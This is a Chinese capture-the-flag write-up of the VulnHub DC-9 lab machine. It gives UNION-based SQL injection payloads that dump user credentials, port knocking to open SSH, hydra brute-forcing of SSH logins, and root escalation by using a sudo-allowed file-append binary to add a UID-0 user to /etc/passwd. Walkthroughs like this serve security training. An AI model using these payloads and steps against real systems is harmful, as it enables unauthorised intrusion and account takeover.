vulnhub： DC 9

信息收集：

root@kali:/opt/test# nmap -A -v 192.168.76.137
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-21 21:51 CST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 21:51
Completed NSE at 21:51, 0.00s elapsed
Initiating NSE at 21:51
Completed NSE at 21:51, 0.00s elapsed
Initiating NSE at 21:51
Completed NSE at 21:51, 0.00s elapsed
Initiating ARP Ping Scan at 21:51
Scanning 192.168.76.137 [1 port]
Completed ARP Ping Scan at 21:51, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:51
Completed Parallel DNS resolution of 1 host. at 21:52, 13.01s elapsed
Initiating SYN Stealth Scan at 21:52
Scanning 192.168.76.137 [1000 ports]
Discovered open port 80/tcp on 192.168.76.137
Completed SYN Stealth Scan at 21:52, 0.14s elapsed (1000 total ports)
Initiating Service scan at 21:52
Scanning 1 service on 192.168.76.137
Completed Service scan at 21:52, 6.04s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against 192.168.76.137
NSE: Script scanning 192.168.76.137.
Initiating NSE at 21:52
Completed NSE at 21:52, 0.22s elapsed
Initiating NSE at 21:52
Completed NSE at 21:52, 0.01s elapsed
Initiating NSE at 21:52
Completed NSE at 21:52, 0.00s elapsed
Nmap scan report for 192.168.76.137
Host is up (0.00084s latency).
Not shown: 998 closed ports
PORT   STATE    SERVICE VERSION
22/tcp filtered ssh
80/tcp open     http    Apache httpd 2.4.38 ((Debian))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Example.com - Staff Details - Welcome
MAC Address: 00:0C:29:79:DB:F0 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 14.277 days (since Mon Sep  7 15:13:16 2020)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=252 (Good luck!)
IP ID Sequence Generation: All zeros

访问80端口的Web服务，在search目录下存在sql注入，union查询判断列数，得到列数为6：

读取数据库名：

search=Mary'%20union%20SELECT%20database(),2,3,4,5,6;%20--%20

得到数据库名：staff

读取数据库中的表名：

search=Mary'%20union%20SELECT%20TABLE_NAME,2,3,4,5,6%20FROM%20information_schema.tables%20WHERE%20TABLE_SCHEMA%3ddatabase();%20--%20

得到表名：

读取列名：

search=Mary'%20union%20SELECT%20column_name,2,3,4,5,6%20FROM%20information_schema.columns%20WHERE%20table_name='Users';%20--%20

　　

从Users表中读取ID、用户名、密码：

search=Mary'%20union%20SELECT%20UserID,2,3,Username,Password,6%20FROM%20Users;%20--%20　

得到用户名和密码：admin: 856f5de590ef37314e7c3bdf6f8a66dc

在线解密得到明文：transorbital1

使用该用户名登录，在manage目录下存在本地文件包含：

尝试包含日志文件失败，无法通过包含日志实现getshell。前文中sql注入还有另外一个数据库，将数据库中的信息dump出来：

读取数据库信息：

search=Mary' union select schema_name,2,3,4,5,6 from information_schema.schemata;--

读取users中的表：

search=Mary' union select table_name,2,3,4,5,6 from information_schema.tables where table_schema='users';--

从UserDetails中读取列名：

search=Mary' union select column_name,2,3,4,5,6 from information_schema.columns where table_schema='users' and table_name='UserDetails';--

读取username和password字段：

search=Mary' union select 1,2,3,username,password,6 from users.UserDetails;--

将用户名和密码整理成两个文件，得到用户名和密码对应关系如下：

user        password
marym        3kfs86sfd
julied        468sfdfsd2
fredf        4sfd87sfd1
barneyr        RocksOff
tomc        TC&TheBoyz
jerrym        B8m#48sd
wilmaf        Pebbles
bettyr        BamBam01
chandlerb    UrAG0D!
joeyt        Passw0rd
rachelg        yN72#dsd
rossg        ILoveRachel
monicag        3248dsds7s
phoebeb        smellycats
scoots        YR3BVxxxw87
janitor        Ilovepeepee
janitor2    Hawaii-Five-0

结合etc/passwd文件，用户在passwd中都有账号，尝试使用hydra爆破，但是22端口的访问被过滤，这是由于使用了knockd服务（https://www.cnblogs.com/bask/p/9159197.html）

需要先连接目标主机的7469，8475，9842 3个端口才能打开连接：

root@kali:/opt/test# ssh 192.168.76.137
ssh: connect to host 192.168.76.137 port 22: Connection refused
root@kali:/opt/test# nmap -p7469,8475,9842 -Pn --max-retries=0 192.168.76.137
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-23 00:16 CST
Nmap scan report for 192.168.76.137
Host is up (0.00041s latency).

PORT     STATE  SERVICE
7469/tcp closed unknown
8475/tcp closed unknown
9842/tcp closed unknown
MAC Address: 00:0C:29:79:DB:F0 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 13.30 seconds
root@kali:/opt/test# ssh 192.168.76.137
The authenticity of host '192.168.76.137 (192.168.76.137)' can't be established.
ECDSA key fingerprint is SHA256:o2Ii/WX152zZCRlVrfXpNnX8mvNwYfOWhkMscAr+sMs.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.76.137' (ECDSA) to the list of known hosts.
root@192.168.76.137's password: 

此时，使用hydra结合之前的用户名密码进行爆破：

root@kali:/opt/test# hydra -L user.txt -P pass.txt ssh://192.168.76.137
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-23 00:20:16
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 289 login tries (l:17/p:17), ~19 tries per task
[DATA] attacking ssh://192.168.76.137:22/
[22][ssh] host: 192.168.76.137   login: chandlerb   password: UrAG0D!
[22][ssh] host: 192.168.76.137   login: joeyt   password: Passw0rd
[22][ssh] host: 192.168.76.137   login: janitor   password: Ilovepeepee
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-09-23 00:21:13

得到3组用户名密码。依次登录后发现，3者都没有sudo权限，但是在janitor的home目录下有隐藏文件夹：

root@kali:/opt/test# ssh janitor@192.168.76.137
janitor@192.168.76.137's password:
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
janitor@dc-9:~$ ls -la
total 16
drwx------  4 janitor janitor 4096 Sep 23 10:21 .
drwxr-xr-x 19 root    root    4096 Dec 29  2019 ..
lrwxrwxrwx  1 janitor janitor    9 Dec 29  2019 .bash_history -> /dev/null
drwx------  3 janitor janitor 4096 Sep 23 10:21 .gnupg
drwx------  2 janitor janitor 4096 Dec 29  2019 .secrets-for-putin
janitor@dc-9:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for janitor:
Sorry, user janitor may not run sudo on dc-9.
janitor@dc-9:~$ more .secrets-for-putin/

*** .secrets-for-putin/: directory ***

janitor@dc-9:~$ cd .secrets-for-putin/
janitor@dc-9:~/.secrets-for-putin$ ls
passwords-found-on-post-it-notes.txt
janitor@dc-9:~/.secrets-for-putin$ more passwords-found-on-post-it-notes.txt
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts
janitor@dc-9:~/.secrets-for-putin$ 

收集该密码存为文本，再次使用之前的用户名列表进行爆破：

root@kali:/opt/test# cat putin_pass.txt
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHt
root@kali:/opt/test# hydra -L user.txt -P putin_pass.txt ssh://192.168.76.137
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-23 00:34:47
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 102 login tries (l:17/p:6), ~7 tries per task
[DATA] attacking ssh://192.168.76.137:22/
[22][ssh] host: 192.168.76.137   login: fredf   password: B4-Tru3-001
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-09-23 00:35:09

该账号有一个无需密码以root身份执行的服务：

fredf@dc-9:~$ ls -la
total 12
drwx------  3 fredf fredf 4096 Sep 23 10:34 .
drwxr-xr-x 19 root  root  4096 Dec 29  2019 ..
lrwxrwxrwx  1 fredf fredf    9 Dec 29  2019 .bash_history -> /dev/null
drwx------  3 fredf fredf 4096 Sep 23 10:34 .gnupg
fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fredf may run the following commands on dc-9:
    (root) NOPASSWD: /opt/devstuff/dist/test/test

该路径下的test是一个ELF文件，尝试通过find模糊查找test相关的文件：

fredf@dc-9:/opt/devstuff/dist/test$ file test
test: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=28ba79c778f7402713aec6af319ee0fbaf3a8014, stripped
fredf@dc-9:/opt/devstuff/dist/test$ find / -name "test*" 2>/dev/null
/opt/devstuff/test.spec
/opt/devstuff/build/test
/opt/devstuff/build/test/test
/opt/devstuff/test.py
/opt/devstuff/dist/test
/opt/devstuff/dist/test/test

在上层父路径下找到一个test.py文件，该文件的作用是将A文件的内容追加到B文件后面：

fredf@dc-9:/opt/devstuff$ more test.py
#!/usr/bin/python

import sys

if len (sys.argv) != 3 :
    print ("Usage: python test.py read append")
    sys.exit (1)

else :
    f = open(sys.argv[1], "r")
    output = (f.read())

    f = open(sys.argv[2], "a")
    f.write(output)
    f.close()

如此可以考虑将新建root用户信息写入文件A将文件A中的信息追写到/etc/passwd，实现提权。

基于sha-512生成一个123456的密码：

root@kali:/opt/test# mkpasswd -m sha-512 123456
$6$1lH.HY2dm4IDDbD4$qgNP3uMMsVIY4CZ4Wgf7rHz12DVW3F/SSZUqHy0hg3kdiVOeSI7b2d2XlJEcUq9LRq3ttXu.QlvZCzs/7h/u71

拼接一个新用户的信息：

admin:$6$1lH.HY2dm4IDDbD4$qgNP3uMMsVIY4CZ4Wgf7rHz12DVW3F/SSZUqHy0hg3kdiVOeSI7b2d2XlJEcUq9LRq3ttXu.QlvZCzs/7h/u71:0:0:admin:/root:/bin/bash

写入文件中：

fredf@dc-9:/opt/devstuff/dist/test$ vi /tmp/new_user
fredf@dc-9:/opt/devstuff/dist/test$ cat /tmp/new_user
admin:$6$1lH.HY2dm4IDDbD4$qgNP3uMMsVIY4CZ4Wgf7rHz12DVW3F/SSZUqHy0hg3kdiVOeSI7b2d2XlJEcUq9LRq3ttXu.QlvZCzs/7h/u71:0:0:admin:/root:/bin/bash

使用sudo执行test将用户信息写入/etc/passwd,然后切换用户身份为admin，密码123456:

fredf@dc-9:/opt/devstuff/dist/test$ sudo /opt/devstuff/dist/test/test /tmp/new_user /etc/passwd
fredf@dc-9:/opt/devstuff/dist/test$ su admin
Password:
root@dc-9:/opt/devstuff/dist/test# whoami
root

得到root权限，拿到flag:

root@dc-9:~# ls
theflag.txt
root@dc-9:~# cat theflag.txt 

███╗   ██╗██╗ ██████╗███████╗    ██╗    ██╗ ██████╗ ██████╗ ██╗  ██╗██╗██╗██╗
████╗  ██║██║██╔════╝██╔════╝    ██║    ██║██╔═══██╗██╔══██╗██║ ██╔╝██║██║██║
██╔██╗ ██║██║██║     █████╗      ██║ █╗ ██║██║   ██║██████╔╝█████╔╝ ██║██║██║
██║╚██╗██║██║██║     ██╔══╝      ██║███╗██║██║   ██║██╔══██╗██╔═██╗ ╚═╝╚═╝╚═╝
██║ ╚████║██║╚██████╗███████╗    ╚███╔███╔╝╚██████╔╝██║  ██║██║  ██╗██╗██╗██╗
╚═╝  ╚═══╝╚═╝ ╚═════╝╚══════╝     ╚══╝╚══╝  ╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═╝╚═╝╚═╝╚═╝

Congratulations - you have done well to get to this point.

Hope you enjoyed DC-9.  Just wanted to send out a big thanks to all those
who have taken the time to complete the various DC challenges.

I also want to send out a big thank you to the various members of @m0tl3ycr3w .

They are an inspirational bunch of fellows.

Sure, they might smell a bit, but...just kidding.  :-)

Sadly, all things must come to an end, and this will be the last ever
challenge in the DC series.

So long, and thanks for all the fish.

总结：

1、SQL手工注入

2、knock敲门打开SSH端口

3、hydra爆破用户名、密码

4、使用不需要root密码的sudo服务提权